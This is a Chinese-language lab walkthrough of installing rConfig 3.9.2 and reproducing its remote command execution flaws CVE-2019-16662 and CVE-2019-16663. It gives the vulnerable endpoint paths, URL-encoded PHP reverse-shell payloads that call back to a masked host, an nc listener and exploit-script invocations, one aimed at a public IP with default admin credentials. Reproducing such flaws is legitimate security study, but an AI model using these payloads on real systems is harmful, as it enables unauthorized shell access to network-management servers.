溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

發(fā)布時(shí)間:2021-12-10 16:32:24 來(lái)源:億速云 閱讀:467 作者:柒染 欄目:大數(shù)據(jù)

今天就跟大家聊聊有關(guān)如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結(jié)了以下內(nèi)容,希望大家根據(jù)這篇文章可以有所收獲。

rConfig是一個(gè)開(kāi)放源代碼的網(wǎng)絡(luò)設(shè)備配置管理實(shí)用程序,網(wǎng)絡(luò)工程師可以使用它來(lái)頻繁獲取其網(wǎng)絡(luò)設(shè)備的配置快照。rConfig是唯一的,因?yàn)槟x擇要針對(duì)設(shè)備運(yùn)行的命令。

只需使用要應(yīng)用于設(shè)備類別的命令列表配置rConfig,然后將設(shè)備添加到該類別。創(chuàng)建一個(gè)計(jì)劃任務(wù),其余工作由rConfig完成?,F(xiàn)在,rConfig版本3具有配置符合性管理實(shí)用程序,使您可以監(jiān)視設(shè)備配置以符合策略。

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

一、環(huán)境搭建

rConfig安裝

cd /home

curl -O https://www.rconfig.com/downloads/scripts/install_rConfig.sh -A "Mozilla"

chmod +x install_rConfig.sh

./install_rConfig.sh

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

運(yùn)行文件安裝發(fā)現(xiàn)報(bào)錯(cuò) 我們打開(kāi)源碼看看為什么連接不上

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

結(jié)果發(fā)現(xiàn)會(huì)curl訪問(wèn)一下谷歌來(lái)判斷是否有網(wǎng) 我們可以直接改成www.baidu.com,但是后面安裝可能會(huì)剛問(wèn)一寫(xiě)被墻的連接,所以我們保險(xiǎn)起見(jiàn),掛個(gè)代理把?。?!我這里用的是proxychains4代理的我內(nèi)網(wǎng)的一個(gè)ss。

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

然后就可以直接正常安裝了。

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

安裝完成之后會(huì)有一個(gè)centos7_postReboot.sh文件

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

我們接著運(yùn)行一下 就可以看見(jiàn)已經(jīng)安裝完成了。剩下就去web頁(yè)面配置了。

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

進(jìn)入https://192.168.157.130/install頁(yè)面進(jìn)行后續(xù)安裝

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

 

到此安裝均已完成,默認(rèn)賬號(hào)密碼為admin admin。

二、漏洞復(fù)現(xiàn)

rConfig 3.9.2及更低版本中的未經(jīng)身份驗(yàn)證的命令執(zhí)行漏洞。安裝后,安裝目錄不會(huì)自動(dòng)刪除,這允許未經(jīng)身份驗(yàn)證的用戶通過(guò)ajaxServerSettingsChk.php文件作為Web服務(wù)器用戶執(zhí)行任意命令。

CVE-2019-16662 rConfig3.9.2遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn):

為了直觀,我自己在服務(wù)器上搭建了一個(gè)rConfig3.9.2系統(tǒng),現(xiàn)在我們來(lái)抓包復(fù)現(xiàn)一下漏洞

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

我們將路徑替換成存在漏的/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

下面我們需要將命令執(zhí)行一道url編碼 然后再填入?yún)?shù)即可。

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

已經(jīng)輸出了我們的回顯,現(xiàn)在我們來(lái)彈個(gè)shell試一下

將url編碼;php -r '$sock=fsockopen("XX.XX.XX.XX",6633);exec("/bin/sh -i <&3 >&3 2>&3");'#

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

另一個(gè)外網(wǎng)服務(wù)器進(jìn)行監(jiān)聽(tīng) nc -lvnp 6633

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

添加參數(shù)發(fā)送請(qǐng)求,可以看到已經(jīng)反彈到shell了。

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

CVE-2019-16662Exp腳本利用

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

python rConfig-CVE-2019-16662.py https://154.221.20.69 XX.XX.XX.XX 6634

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

CVE-2019-16663 rConfig3.9.2遠(yuǎn)程命令執(zhí)行漏洞復(fù)現(xiàn)

這個(gè)RCE需要身份驗(yàn)證才能執(zhí)行,存在lib/crud/search.crud.php這個(gè)文件里。

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

登錄成功之后進(jìn)行抓包 替換成RCE的路徑 將反彈shell的payload進(jìn)行編碼

""&&php -r '$sock=fsockopen("XX.XX.XX.XX",6635);exec("/bin/sh -i <&3 >&3 2>&3");'#

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

監(jiān)聽(tīng),反彈,成功

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

CVE-2019-16663 EXP利用

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

python rConfig-CVE-2019-16663.py https://154.221.20.69 admin admin IP 6636

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

CVE-2019-19509 rConfig3.9.3遠(yuǎn)程命令執(zhí)行漏洞

由于3.9.3的安裝包被官方刪除和下架了,現(xiàn)在無(wú)法復(fù)現(xiàn),但網(wǎng)上已有Exp。

如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建

看完上述內(nèi)容,你們對(duì)如何進(jìn)行rConfig-CVE漏洞復(fù)現(xiàn)及環(huán)境搭建有進(jìn)一步的了解嗎?如果還想了解更多知識(shí)或者相關(guān)內(nèi)容,請(qǐng)關(guān)注億速云行業(yè)資訊頻道,感謝大家的支持。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI